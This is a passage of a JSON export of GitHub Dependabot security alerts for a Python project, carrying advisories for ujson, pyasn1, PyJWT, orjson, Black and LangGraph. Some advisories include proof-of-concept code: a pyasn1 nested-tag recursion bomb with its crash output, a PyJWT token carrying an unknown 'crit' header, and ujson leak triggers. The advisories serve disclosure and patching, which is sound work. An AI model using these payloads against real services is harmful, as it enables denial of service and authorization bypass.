5.11.0","first_patched_version":{"identifier":"5.12.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/95","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/95","created_at":"2026-05-13T05:27:15Z","updated_at":"2026-05-13T05:27:15Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":94,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"ujson"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-wgvc-ghv9-3pmm","cve_id":"CVE-2026-32874","summary":"UltraJSON has a Memory Leak parsing large integers allows DoS ","description":"#### Summary\n\nujson 5.4.0 to 5.11.0 inclusive contain an accumulating memory leak in JSON parsing _large_ (outside of the range [-2^63, 2^64 - 1]) integers.\n\n#### Exploitability\n\nAny service that calls `ujson.load()`/`ujson.loads()`/`ujson.decode()` on untrusted inputs is affected and vulnerable to denial of service attacks.\n\n#### Details\n\nThe leaked memory is a copy of the string form of the integer plus an additional NULL byte. The leak occurs irrespective of whether the integer parses successfully or is rejected due to having more than `sys.get_int_max_str_digits()` digits, meaning that any sized leak per malicious JSON can be achieved provided that there is no limit on the overall size of the payload.\n\n```python\nujson.loads(str(2 ** 64 - 1)) # No leak\nujson.loads(str(2 ** 64)) # Leaks\nujson.loads(str(10 ** sys.get_int_max_str_digits())) # Leaks and raises ValueError\n```\n\n#### Fix\n\nThe leak is fixed in `ujson 5.12.0` (4baeb950df780092bd3c89fc702a868e99a3a1d2). There are no workarounds beyond upgrading to an unaffected version.\n\n#### Credits\n\nDiscovered by Cameron Criswell/Skevros using Coverage-guided fuzzing (libFuzzer + AddressSanitizer)","severity":"high","identifiers":[{"value":"GHSA-wgvc-ghv9-3pmm","type":"GHSA"},{"value":"CVE-2026-32874","type":"CVE"}],"references":[{"url":"https://github.com/ultrajson/ultrajson/security/advisories/GHSA-wgvc-ghv9-3pmm"},{"url":"https://github.com/ultrajson/ultrajson/commit/4baeb950df780092bd3c89fc702a868e99a3a1d2"},{"url":"https://github.com/ultrajson/ultrajson/releases/tag/5.12.0"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32874"},{"url":"https://github.com/advisories/GHSA-wgvc-ghv9-3pmm"}],"published_at":"2026-03-18T13:01:15Z","updated_at":"2026-03-20T21:19:51Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":">= 5.4.0, <= 5.11.0","first_patched_version":{"identifier":"5.12.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00073,"percentile":0.22173},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-401","name":"Missing Release of Memory after Effective Lifetime"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"ujson"},"severity":"high","vulnerable_version_range":">= 5.4.0, <= 5.11.0","first_patched_version":{"identifier":"5.12.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/94","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/94","created_at":"2026-05-13T05:27:15Z","updated_at":"2026-05-13T05:27:15Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":93,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"pyasn1"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-jr27-m4p2-rc6r","cve_id":"CVE-2026-30922","summary":"Denial of Service in pyasn1 via Unbounded Recursion","description":"### Summary\nThe `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with Indefinite Length (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application.\n\n### Details\nThe vulnerability exists because the decoder iterates through the input stream and recursively calls `decodeFun` (the decoding callback) for every nested component found, without tracking or limiting the recursion depth.\nVulnerable Code Locations:\n1. `indefLenValueDecoder` (Line 998):\n```for component in decodeFun(substrate, asn1Spec, allowEoo=True, **options):```\nThis method handles indefinite-length constructed types. It sits inside a `while True` loop and recursively calls the decoder for every nested tag.\n\n2. `valueDecoder` (Lines 786 and 907):\n```for component in decodeFun(substrate, componentType, **options):```\nThis method handles standard decoding when a schema is present. It contains two distinct recursive calls that lack depth checks: Line 786: Recursively decodes components of `SEQUENCE` or `SET` types. Line 907: Recursively decodes elements of `SEQUENCE OF` or `SET OF` types.\n\n4. `_decodeComponentsSchemaless` (Line 661):\n```for component in decodeFun(substrate, **options):```\nThis method handles decoding when no schema is provided.\n\nIn all three cases, `decodeFun` is invoked without passing a `depth` parameter or checking against a global `MAX_ASN1_NESTING` limit.\n\n### PoC\n```\nimport sys\nfrom pyasn1.codec.ber import decoder\n\nsys.setrecursionlimit(100000)\n\nprint(\"[*] Generating Recursion Bomb Payload...\")\ndepth = 50_000\nchunk = b'\\x30\\x80' \npayload = chunk * depth\n\nprint(f\"[*] Payload size: {len(payload) / 1024:.2f} KB\")\nprint(\"[*] Triggering Decoder...\")\n\ntry:\n decoder.decode(payload)\nexcept RecursionError:\n print(\"[!] Crashed: Recursion Limit Hit\")\nexcept MemoryError:\n print(\"[!] Crashed: Out of Memory\")\nexcept Exception as e:\n print(f\"[!] Crashed: {e}\")\n```\n\n```\n[*] Payload size: 9.77 KB\n[*] Triggering Decoder...\n[!] Crashed: Recursion Limit Hit\n```\n\n### Impact\n- This is an unhandled runtime exception that typically terminates the worker process or thread handling the request. This allows a remote attacker to trivially kill service workers with a small payload (<100KB), resulting in a Denial of Service. Furthermore, in environments where recursion limits are increased, this leads to server-wide memory exhaustion.\n- Service Crash: Any service using `pyasn1` to parse untrusted ASN.1 data (e.g., LDAP, SNMP, Kerberos, X.509 parsers) can be crashed remotely.\n- Resource Exhaustion: The attack consumes RAM linearly with the nesting depth. A small payload (<200KB) can consume hundreds of megabytes of RAM or exhaust the stack.\n\n### Credits\nVulnerability discovered by Kevin Tu of TMIR at ByteDance.","severity":"high","identifiers":[{"value":"GHSA-jr27-m4p2-rc6r","type":"GHSA"},{"value":"CVE-2026-30922","type":"CVE"}],"references":[{"url":"https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r"},{"url":"https://github.com/pyasn1/pyasn1/commit/5a49bd1fe93b5b866a1210f6bf0a3924f21572c8"},{"url":"https://github.com/pyasn1/pyasn1/releases/tag/v0.6.3"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30922"},{"url":"https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0"},{"url":"http://www.openwall.com/lists/oss-security/2026/03/20/4"},{"url":"https://lists.debian.org/debian-lts-announce/2026/05/msg00001.html"},{"url":"https://github.com/advisories/GHSA-jr27-m4p2-rc6r"}],"published_at":"2026-03-17T16:17:33Z","updated_at":"2026-05-01T18:31:19Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"pyasn1"},"severity":"high","vulnerable_version_range":"<= 0.6.2","first_patched_version":{"identifier":"0.6.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00026,"percentile":0.07182},"cvss":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","score":7.5},"cwes":[{"cwe_id":"CWE-674","name":"Uncontrolled Recursion"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"pyasn1"},"severity":"high","vulnerable_version_range":"<= 0.6.2","first_patched_version":{"identifier":"0.6.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/93","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/93","created_at":"2026-05-13T05:27:14Z","updated_at":"2026-05-13T05:27:14Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":92,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"PyJWT"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-752w-5fwx-jx9f","cve_id":"CVE-2026-32597","summary":"PyJWT accepts unknown `crit` header extensions","description":"## Summary\n\nPyJWT does not validate the `crit` (Critical) Header Parameter defined in\nRFC 7515 §4.1.11. When a JWS token contains a `crit` array listing\nextensions that PyJWT does not understand, the library accepts the token\ninstead of rejecting it. This violates the **MUST** requirement in the RFC.\n\nThis is the same class of vulnerability as CVE-2025-59420 (Authlib),\nwhich received CVSS 7.5 (HIGH).\n\n---\n\n## RFC Requirement\n\nRFC 7515 §4.1.11:\n\n> The \"crit\" (Critical) Header Parameter indicates that extensions to this\n> specification and/or [JWA] are being used that **MUST** be understood and\n> processed. [...] If any of the listed extension Header Parameters are\n> **not understood and supported** by the recipient, then the **JWS is invalid**.\n\n---\n\n## Proof of Concept\n\n```python\nimport jwt # PyJWT 2.8.0\nimport hmac, hashlib, base64, json\n\n# Construct token with unknown critical extension\nheader = {\"alg\": \"HS256\", \"crit\": [\"x-custom-policy\"], \"x-custom-policy\": \"require-mfa\"}\npayload = {\"sub\": \"attacker\", \"role\": \"admin\"}\n\ndef b64url(data):\n return base64.urlsafe_b64encode(data).rstrip(b\"=\").decode()\n\nh = b64url(json.dumps(header, separators=(\",\", \":\")).encode())\np = b64url(json.dumps(payload, separators=(\",\", \":\")).encode())\nsig = b64url(hmac.new(b\"secret\", f\"{h}.{p}\".encode(), hashlib.sha256).digest())\ntoken = f\"{h}.{p}.{sig}\"\n\n# Should REJECT — x-custom-policy is not understood by PyJWT\ntry:\n result = jwt.decode(token, \"secret\", algorithms=[\"HS256\"])\n print(f\"ACCEPTED: {result}\")\n # Output: ACCEPTED: {'sub': 'attacker', 'role': 'admin'}\nexcept Exception as e:\n print(f\"REJECTED: {e}\")\n```\n\n**Expected:** `jwt.exceptions.InvalidTokenError: Unsupported critical extension: x-custom-policy`\n**Actual:** Token accepted, payload returned.\n\n### Comparison with RFC-compliant library\n\n```python\n# jwcrypto — correctly rejects\nfrom jwcrypto import jwt as jw_jwt, jwk\nkey = jwk.JWK(kty=\"oct\", k=b64url(b\"secret\"))\njw_jwt.JWT(jwt=token, key=key, algs=[\"HS256\"])\n# raises: InvalidJWSObject('Unknown critical header: \"x-custom-policy\"')\n```\n\n---\n\n## Impact\n\n- **Split-brain verification** in mixed-library deployments (e.g., API\n gateway using jwcrypto rejects, backend using PyJWT accepts)\n- **Security policy bypass** when `crit` carries enforcement semantics\n (MFA, token binding, scope restrictions)\n- **Token binding bypass** — RFC 7800 `cnf` (Proof-of-Possession) can be\n silently ignored\n- See CVE-2025-59420 for full impact analysis\n\n---\n\n## Suggested Fix\n\nIn `jwt/api_jwt.py`, add validation in `_validate_headers()` or\n`decode()`:\n\n```python\n_SUPPORTED_CRIT = {\"b64\"} # Add extensions PyJWT actually supports\n\ndef _validate_crit(self, headers: dict) -> None:\n crit = headers.get(\"crit\")\n if crit is None:\n return\n if not isinstance(crit, list) or len(crit) == 0:\n raise InvalidTokenError(\"crit must be a non-empty array\")\n for ext in crit:\n if ext not in self._SUPPORTED_CRIT:\n raise InvalidTokenError(f\"Unsupported critical extension: {ext}\")\n if ext not in headers:\n raise InvalidTokenError(f\"Critical extension {ext} not in header\")\n```\n\n---\n\n## CWE\n\n- CWE-345: Insufficient Verification of Data Authenticity\n- CWE-863: Incorrect Authorization\n\n## References\n\n- [RFC 7515 §4.1.11](https://www.rfc-editor.org/rfc/rfc7515.html#section-4.1.11)\n- [CVE-2025-59420 — Authlib crit bypass (CVSS 7.5)](https://osv.dev/vulnerability/GHSA-9ggr-2464-2j32)\n- [RFC 7800 — Proof-of-Possession Key Semantics](https://www.rfc-editor.org/rfc/rfc7800)","severity":"high","identifiers":[{"value":"GHSA-752w-5fwx-jx9f","type":"GHSA"},{"value":"CVE-2026-32597","type":"CVE"}],"references":[{"url":"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-752w-5fwx-jx9f"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32597"},{"url":"https://lists.debian.org/debian-lts-announce/2026/05/msg00008.html"},{"url":"https://github.com/advisories/GHSA-752w-5fwx-jx9f"}],"published_at":"2026-03-13T20:05:04Z","updated_at":"2026-05-05T18:34:23Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"PyJWT"},"severity":"high","vulnerable_version_range":"<= 2.11.0","first_patched_version":{"identifier":"2.12.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","score":7.5},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00013,"percentile":0.02358},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","score":7.5},"cwes":[{"cwe_id":"CWE-345","name":"Insufficient Verification of Data Authenticity"},{"cwe_id":"CWE-863","name":"Incorrect Authorization"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"PyJWT"},"severity":"high","vulnerable_version_range":"<= 2.11.0","first_patched_version":{"identifier":"2.12.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/92","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/92","created_at":"2026-05-13T05:27:14Z","updated_at":"2026-05-13T05:27:14Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":91,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"orjson"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-hx9q-6w63-j58v","cve_id":"CVE-2025-67221","summary":"orjson does not limit recursion for deeply nested JSON documents","description":"The orjson.dumps function in orjson before 3.11.6 does not limit recursion for deeply nested JSON documents.","severity":"high","identifiers":[{"value":"GHSA-hx9q-6w63-j58v","type":"GHSA"},{"value":"CVE-2025-67221","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-67221"},{"url":"https://github.com/ijl/orjson"},{"url":"https://github.com/kpatsakis/orjson_vulnerability"},{"url":"https://github.com/ijl/orjson/issues/620"},{"url":"https://github.com/kpatsakis/CVE-2025-67221/issues/1"},{"url":"https://github.com/ijl/orjson/commit/62bb185b70785ded49c79c26f8c9781f1e6fe370"},{"url":"https://github.com/advisories/GHSA-hx9q-6w63-j58v"}],"published_at":"2026-01-22T18:30:33Z","updated_at":"2026-03-12T20:49:11Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"orjson"},"severity":"high","vulnerable_version_range":"< 3.11.6","first_patched_version":{"identifier":"3.11.6"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P","score":7.7}},"epss":{"percentage":0.00025,"percentile":0.06553},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-770","name":"Allocation of Resources Without Limits or Throttling"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"orjson"},"severity":"high","vulnerable_version_range":"< 3.11.6","first_patched_version":{"identifier":"3.11.6"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/91","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/91","created_at":"2026-05-13T05:27:14Z","updated_at":"2026-05-13T05:27:14Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":90,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"black"},"manifest_path":"methods/EverCore/uv.lock","scope":"development","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-3936-cmfr-pm3m","cve_id":"CVE-2026-32274","summary":"Black: Arbitrary file writes from unsanitized user input in cache file name","description":"### Impact\n\nBlack writes a cache file, the name of which is computed from various formatting options. The value of the `--python-cell-magics` option was placed in the filename without sanitization, which allowed an attacker who controls the value of this argument to write cache files to arbitrary file system locations. \n\n### Patches\n\nFixed in Black 26.3.1.\n\n### Workarounds\n\nDo not allow untrusted user input into the value of the `--python-cell-magics` option.","severity":"high","identifiers":[{"value":"GHSA-3936-cmfr-pm3m","type":"GHSA"},{"value":"CVE-2026-32274","type":"CVE"}],"references":[{"url":"https://github.com/psf/black/security/advisories/GHSA-3936-cmfr-pm3m"},{"url":"https://github.com/psf/black/pull/5038"},{"url":"https://github.com/psf/black/commit/4937fe6cf241139ddbfc16b0bdbb5b422798909d"},{"url":"https://github.com/psf/black/releases/tag/26.3.1"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32274"},{"url":"https://github.com/advisories/GHSA-3936-cmfr-pm3m"}],"published_at":"2026-03-12T18:33:10Z","updated_at":"2026-03-13T13:36:21Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"black"},"severity":"high","vulnerable_version_range":"< 26.3.1","first_patched_version":{"identifier":"26.3.1"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N","score":8.7}},"epss":{"percentage":0.00021,"percentile":0.05654},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"black"},"severity":"high","vulnerable_version_range":"< 26.3.1","first_patched_version":{"identifier":"26.3.1"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/90","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/90","created_at":"2026-05-13T05:27:14Z","updated_at":"2026-05-13T05:27:14Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":89,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"langgraph"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-g48c-2wqr-h844","cve_id":"CVE-2026-28277","summary":"LangGraph checkpoint loading has unsafe msgpack deserialization","description":"LangGraph checkpointers can load msgpack-encoded checkpoints that reconstruct Python objects during deserialization. If an attacker can modify checkpoint data in the backing store (for example, after a database compromise or other privileged write access to the persistence layer), they can potentially supply a crafted payload that triggers unsafe object reconstruction when the checkpoint is loaded.\n\nThis is a **post-exploitation / defense-in-depth** issue. Exploitation requires the ability to write attacker-controlled checkpoint bytes at rest. In most deployments that prerequisite already implies a serious incident; the additional risk is turning “checkpoint-store write access” into code execution in the application runtime, which can expand blast radius (for example by exposing environment variables or cloud credentials available to the runtime).\n\nThere is no evidence of exploitation in the wild, and LangGraph is not aware of a practical exploitation path in existing deployments today. This change is intended to reduce the blast radius of a checkpoint-store compromise.\n\n## Affected users / systems\n\nUsers may be affected if they:\n\n- use a persistent checkpointer (database, remote store, shared filesystem, etc.),\n- load/resume from checkpoints, and\n- operate in an environment where an attacker could gain privileged write access to checkpoint data in the backing store.\n\nThis issue requires the attacker to be able to modify persisted checkpoint bytes (or to compromise a trusted component that writes them). It is generally not reachable by an unauthenticated remote attacker in a correctly configured deployment.\n\n## Impact\n- Potential **arbitrary code execution** or other unsafe side effects during checkpoint deserialization.\n- Escalation from “write access to checkpoint store” to “code execution in the application runtime,” which may expose runtime secrets or provide access to other systems the runtime can reach.\n\n## Exploitation scenario (high level)\n1. Attacker gains privileged write access to the checkpoint store (for example, via database compromise, leaked credentials, or abuse of an administrative data path).\n2. Attacker writes a crafted checkpoint payload containing msgpack data intended to reconstruct dangerous objects.\n3. Application resumes and deserializes the checkpoint; unsafe reconstruction could execute attacker-controlled behavior.\n\n## Mitigation / remediation\nLangGraph provides an allowlist-based hardening mechanism for msgpack checkpoint deserialization.\n\n### Strict mode (environment variable)\n- **`LANGGRAPH_STRICT_MSGPACK`**\n - When set truthy (`1`, `true`, `yes`), the default msgpack deserialization policy becomes strict.\n - Concretely: `JsonPlusSerializer()` will default `allowed_msgpack_modules` to `None` (strict) instead of `True` (warn-and-allow), unless `allowed_msgpack_modules=...` is explicitly passed.\n\n### `allowed_msgpack_modules` (serializer/checkpointer config)\nThis setting controls what msgpack “ext” types are allowed to be reconstructed.\n\n- `True` (default when strict mode is not enabled): allow all ext types, but log a warning when deserializing a type that is not explicitly registered.\n- `None` (strict): only a built-in safe set is reconstructed; other ext types are blocked.\n- `[(module, class_name), ...]` (strict allowlist): the built-in safe set plus exactly the listed symbols are reconstructed (exact-match).\n\n### Built-in safe set\nA small set of types is always treated as safe to reconstruct (for example `datetime` types, `uuid.UUID`, `decimal.Decimal`, `set`/`frozenset`/`deque`, `ipaddress` types, `pathlib` paths, `zoneinfo.ZoneInfo`, compiled regex patterns, and selected LangGraph internal types).\n\n### Automatically derived allowlist (only when compiling graphs)\nWhen `LANGGRAPH_STRICT_MSGPACK` is enabled and `StateGraph` is compiled, LangGraph derives an allowlist from the graph’s schemas and channels and applies it to the checkpointer.\n\n- The allowlist is built by walking the state/input/output/context schemas (plus node/branch input schemas) and channel value/update types. It includes Pydantic v1/v2 models, dataclasses, enums, TypedDict field types, and common typing constructs (containers, unions, `Annotated`).\n- LangGraph also includes a curated set of common LangChain message classes.\n\nThis derived allowlist is only applied if the selected checkpointer supports `with_allowlist(...)`. If a user is constructing serializers/checkpointers manually (or using a checkpointer that does not support allowlist propagation), they will need to configure `allowed_msgpack_modules` themselves.\n\n### Operational guidance\n- Treat checkpoint stores as integrity-sensitive. Restrict write access and rotate credentials if compromise is suspected.\n- Enable strict mode (`LANGGRAPH_STRICT_MSGPACK=true`) in production if feasible, and rely on schema-driven allowlisting to reduce incompatibilities.\n- Avoid providing custom msgpack deserialization hooks that reconstruct arbitrary types unless checkpoint data is fully trusted.\n\n## Limitations / important notes\n- If a checkpointer implementation does **not** support allowlist application (i.e., does not implement `with_allowlist`), allowlist enforcement may be skipped (with a warning). In that situation, strict expectations may not hold.\n- If an application supplies a custom msgpack unpack hook (`ext_hook`), the custom hook controls reconstruction and can bypass the default allowlist checks (intentional escape hatch, but it weakens the protection).\n\n## LangSmith / hosted deployments note\nLangSmith is not aware of this issue presenting risk to existing LangSmith-hosted deployments. The described threat model requires an attacker to tamper with the checkpoint persistence layer used by the deployment; typical hosted configurations are designed to prevent such access.\n\nFirst reported by: yardenporat353","severity":"medium","identifiers":[{"value":"GHSA-g48c-2wqr-h844","type":"GHSA"},{"value":"CVE-2026-28277","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langgraph/security/advisories/GHSA-g48c-2wqr-h844"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28277"},{"url":"https://github.com/advisories/GHSA-g48c-2wqr-h844"}],"published_at":"2026-03-05T20:19:49Z","updated_at":"2026-03-09T13:19:59Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langgraph"},"severity":"medium","vulnerable_version_range":"<= 1.0.9","first_patched_version":{"identifier":"1.0.10"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H","score":6.8},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00332,"percentile":0.56073},"cvss":{"vector_string":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H","score":6.8},"cwes":[{"cwe_id":"CWE-502","name":"Deserialization of Untrusted Data"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langgraph"},"severity":"medium","vulnerable_version_range":"<= 1.0.9","first_patched_version":{"identifier":"1.0.10"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/89","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/89","created_at":"2026-05-13T05:27:14Z","updated_at":"2026-05-13T05:27:14Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":null,"auto_dismissed_at":null},{"number":88,"state":"open","dependency":{"package":{"ecosystem":"pip","name":"langgraph-checkpoint"},"manifest_path":"methods/EverCore/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-mhr3-j7m5-c7c9","cve_id":"CVE-2026-27794","summary":"LangGraph: BaseCache Deserialization of Untrusted Data may lead to Remote Code Execution ","description":"## Context\n\nA Remote Code Execution vulnerability exists in LangGraph's caching layer when applications enable cache backends that inherit from `BaseCache` and opt nodes into caching via `CachePolicy`. Prior to `langgraph-checkpoint` 4.0.0, `BaseCache` defaults to `JsonPlusSerializer(pickle_fallback=True)`. When msgpack serialization fails, cached values can be deserialized via `pickle.loads(...)`.\n\n### Who is affected?\n\nCaching is not enabled by default. Applications are affected only when:\n\n- The application explicitly enables a cache backend (for example by passing `cache=...` to `StateGraph.compile(...)` or otherwise configuring a `BaseCache` implementation)\n- One or more nodes opt into caching via `CachePolicy`\n- The attacker can write to the cache backend (for example a network-accessible Redis instance with weak/no auth, shared cache infrastructure reachable by other tenants/services, or a writable SQLite cache file)\n\nExample (enabling a cache backend and opting a node into caching):\n\n```py\nfrom langgraph.cache.memory import InMemoryCache\nfrom langgraph.graph import StateGraph\nfrom langgraph.types import CachePolicy\n\n\ndef my_node(state: dict) -> dict:\n return {\"value\": state.get(\"value\", 0) + 1}\n\n\nbuilder = StateGraph(dict)\nbuilder.add_node(\"my_node\", my_node, cache_policy=CachePolicy(ttl=120))\nbuilder.set_entry_point(\"my_node\")\n\ngraph = builder.compile(cache=InMemoryCache())\n\nresult = graph.invoke({\"value\": 1})\n```\n\nWith `pickle_fallback=True`, when msgpack serialization fails, `JsonPlusSerializer` can fall back to storing values as a `(\"pickle\", )` tuple and later deserialize them via `pickle.loads(...)`. If an attacker can place a malicious pickle payload into the cache backend such that the LangGraph process reads and deserializes it, this can lead to arbitrary code execution.\n\nExploitation requires attacker write access to the cache backend. The serializer is not exposed as a network-facing API.\n\nThis is fixed in `langgraph-checkpoint>=4.0.0` by disabling pickle fallback by default (`pickle_fallback=False`).\n\n## Impact\n\nArbitrary code execution in the LangGraph process when attacker-controlled cache entries are deserialized.\n\n## Root Cause\n\n- `BaseCache` default serializer configuration inherited by cache implementations (`InMemoryCache`, `RedisCache`, `SqliteCache`):\n - `libs/checkpoint/langgraph/cache/base/__init__.py` (pre-fix default: `JsonPlusSerializer(pickle_fallback=True)`)\n\n- `JsonPlusSerializer` deserialization sink:\n - `libs/checkpoint/langgraph/checkpoint/serde/jsonplus.py`\n - `loads_typed(...)` calls `pickle.loads(data_)` when `type_ == \"pickle\"` and pickle fallback is enabled\n\n## Attack preconditions\n\nAn attacker must be able to write attacker-controlled bytes into the cache backend such that the LangGraph process later reads and deserializes them.\n\nThis typically requires write access to a networked cache (for example a network-accessible Redis instance with weak/no auth or shared cache infrastructure reachable by other tenants/services) or write access to local cache storage (for example a writable SQLite cache file via permissive file permissions or a shared writable volume).\n\nBecause exploitation requires write access to the cache storage layer, this is a post-compromise / post-access escalation vector.\n\n## Remediation\n\n- Upgrade to `langgraph-checkpoint>=4.0.0`.\n\n## Resources\n\n- ZDI-CAN-28385\n- Patch: https://github.com/langchain-ai/langgraph/pull/6677\n- Patch diff: https://patch-diff.githubusercontent.com/raw/langchain-ai/langgraph/pull/6677.patch\n- Credit: Peter Girnus (@gothburz), Demeng Chen, and Brandon Niemczyk (Trend Micro Zero Day Initiative)","severity":"medium","identifiers":[{"value":"GHSA-mhr3-j7m5-c7c9","type":"GHSA"},{"value":"CVE-2026-27794","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langgraph/security/advisories/GHSA-mhr3-j7m5-c7c9"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27794"},{"url":"https://github.com/langchain-ai/langgraph/pull/6677"},{"url":"https://github.com/langchain-ai/langgraph/commit/f91d79d0c86932ded6e3b9f195d5a0bbd5aef99c"},{"url":"https://github.com/langchain-ai/langgraph/releases/tag/checkpoint%3D%3D4.0.0"},{"url":"https://github.com/advisories/GHSA-mhr3-j7m5-c7c9"}],"published_at":"2026-02-25T22:59:12Z","updated_at":"2026-02-25T22:59:14Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langgraph-checkpoint"},"severity":"medium","vulnerable_version_range":"< 